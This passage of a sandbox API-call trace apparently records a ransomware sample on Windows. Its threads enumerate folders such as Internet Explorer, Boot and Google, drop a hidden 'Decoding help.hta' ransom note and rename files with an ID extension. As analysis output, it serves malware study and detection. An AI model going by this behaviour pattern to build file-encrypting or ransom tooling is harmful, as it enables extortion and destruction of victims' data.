Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.130] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdbg2.dll") returned -1 [0039.130] lstrlenW (lpString="msdbg2.dll") returned 10 [0039.130] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.130] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.130] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="msdbg2.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll" [0039.130] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll" [0039.130] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.130] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594eb7ab, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x594eb7ab, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x439e9300, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x83200, dwReserved0=0x0, dwReserved1=0x0, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0039.130] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.130] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.130] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.130] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pdm.dll") returned -1 [0039.130] lstrlenW (lpString="pdm.dll") returned 7 [0039.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="pdm.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll" [0039.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll" [0039.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll" (normalized: "c:\\program files\\internet explorer\\pdm.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\pdm.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.131] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0039.131] lstrcmpW (lpString1=".", lpString2="SIGNUP") returned -1 [0039.131] lstrcmpW (lpString1="..", lpString2="SIGNUP") returned -1 [0039.131] lstrcmpiW (lpString1="windows", lpString2="SIGNUP") returned 1 [0039.133] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="SIGNUP" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP" [0039.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*" [0039.133] GlobalMemoryStatus (in: lpBuffer=0x490fd10 | out: lpBuffer=0x490fd10) [0039.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95b1bb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.144] CloseHandle (hObject=0x198) returned 1 [0039.145] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0039.145] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.145] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.145] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.145] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqmapi.dll") returned -1 [0039.145] lstrlenW (lpString="sqmapi.dll") returned 10 [0039.145] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.145] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.145] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="sqmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" [0039.145] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" [0039.145] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.146] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0039.146] FindClose (in: hFindFile=0x5a53b0 | out: hFindFile=0x5a53b0) returned 1 Thread: id = 36 os_tid = 0xac4 [0039.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*.*", lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5330 [0039.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.087] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.088] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.088] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.088] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\*.*") returned="\\\\?\\C:\\Boot\\en-US\\*.*" [0039.088] lstrlenW (lpString="\\\\?\\C:\\Boot\\en-US\\*.*") returned 21 [0039.088] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\en-US\\Decoding help.hta" [0039.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\Decoding help.hta" (normalized: "c:\\boot\\en-us\\decoding help.hta")) returned 0xffffffff [0039.088] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\Decoding help.hta" (normalized: "c:\\boot\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0039.088] WriteFile (in: hFile=0x188, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4a4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4a4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.089] CloseHandle (hObject=0x188) returned 1 [0039.089] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.089] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.089] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\*.*") returned="\\\\?\\C:\\Boot\\en-US\\*.*" [0039.089] lstrlenW (lpString="\\\\?\\C:\\Boot\\en-US\\*.*") returned 21 [0039.089] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" [0039.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" [0039.089] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.090] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0039.090] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\*.*") returned="\\\\?\\C:\\Boot\\en-US\\*.*" [0039.090] lstrlenW (lpString="\\\\?\\C:\\Boot\\en-US\\*.*") returned 21 [0039.090] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\en-US\\Decoding help.hta" [0039.090] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\Decoding help.hta" (normalized: "c:\\boot\\en-us\\decoding help.hta")) returned 0x1 [0039.090] lstrcmpiW (lpString1="Decoding help.hta", lpString2="memtest.exe.mui") returned -1 [0039.090] lstrlenW (lpString="memtest.exe.mui") returned 15 [0039.090] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\*.*") returned="\\\\?\\C:\\Boot\\en-US\\*.*" [0039.090] lstrlenW (lpString="\\\\?\\C:\\Boot\\en-US\\*.*") returned 21 [0039.090] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US\\", lpString2="memtest.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" [0039.090] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" [0039.090] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.090] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0039.090] FindClose (in: hFindFile=0x5a5330 | out: hFindFile=0x5a5330) returned 1 Thread: id = 37 os_tid = 0xac8 [0039.101] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*.*", lpFindFileData=0x4b8fd30 | out: lpFindFileData=0x4b8fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 38 os_tid = 0xacc [0039.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\*.*", lpFindFileData=0x4ccfd30 | out: lpFindFileData=0x4ccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5330 [0039.109] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.109] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4ccfd30 | out: lpFindFileData=0x4ccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.109] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.109] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.109] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4ccfd30 | out: lpFindFileData=0x4ccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e0ead20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7e0ead20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrome", cAlternateFileName="")) returned 1 [0039.109] lstrcmpW (lpString1=".", lpString2="Chrome") returned -1 [0039.109] lstrcmpW (lpString1="..", lpString2="Chrome") returned -1 [0039.109] lstrcmpiW (lpString1="windows", lpString2="Chrome") returned 1 [0039.111] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" [0039.111] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned 37 [0039.111] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\", lpString2="Chrome" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome" [0039.111] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\*.*" [0039.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95389a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.126] CloseHandle (hObject=0x1a8) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4ccfd30 | out: lpFindFileData=0x4ccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 1 [0039.126] lstrcmpW (lpString1=".", lpString2="CrashReports") returned -1 [0039.126] lstrcmpW (lpString1="..", lpString2="CrashReports") returned -1 [0039.126] lstrcmpiW (lpString1="windows", lpString2="CrashReports") returned 1 [0039.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" [0039.128] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned 37 [0039.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\", lpString2="CrashReports" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\CrashReports") returned="\\\\?\\C:\\Program Files (x86)\\Google\\CrashReports" [0039.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\CrashReports", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\CrashReports\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\CrashReports\\*.*" [0039.128] GlobalMemoryStatus (in: lpBuffer=0x4ccfd10 | out: lpBuffer=0x4ccfd10) [0039.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9599b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.144] CloseHandle (hObject=0x1a8) returned 1 [0039.144] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x4ccfd30 | out: lpFindFileData=0x4ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fff1f30, ftCreationTime.dwHighDateTime=0x1d4caba, ftLastAccessTime.dwLowDateTime=0x5ee29020, ftLastAccessTime.dwHighDateTime=0x1d49d5e, ftLastWriteTime.dwLowDateTime=0x5ee29020, ftLastWriteTime.dwHighDateTime=0x1d49d5e, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="shoes perception.exe", cAlternateFileName="SHOESP~1.EXE")) returned 1 [0039.144] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" [0039.144] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned 37 [0039.144] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Decoding help.hta" [0039.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Decoding help.hta" (normalized: "c:\\program files (x86)\\google\\decoding help.hta")) returned 0xffffffff [0039.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Decoding help.hta" (normalized: "c:\\program files (x86)\\google\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0039.158] WriteFile (in: hFile=0x1b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4ccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4ccfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.162] 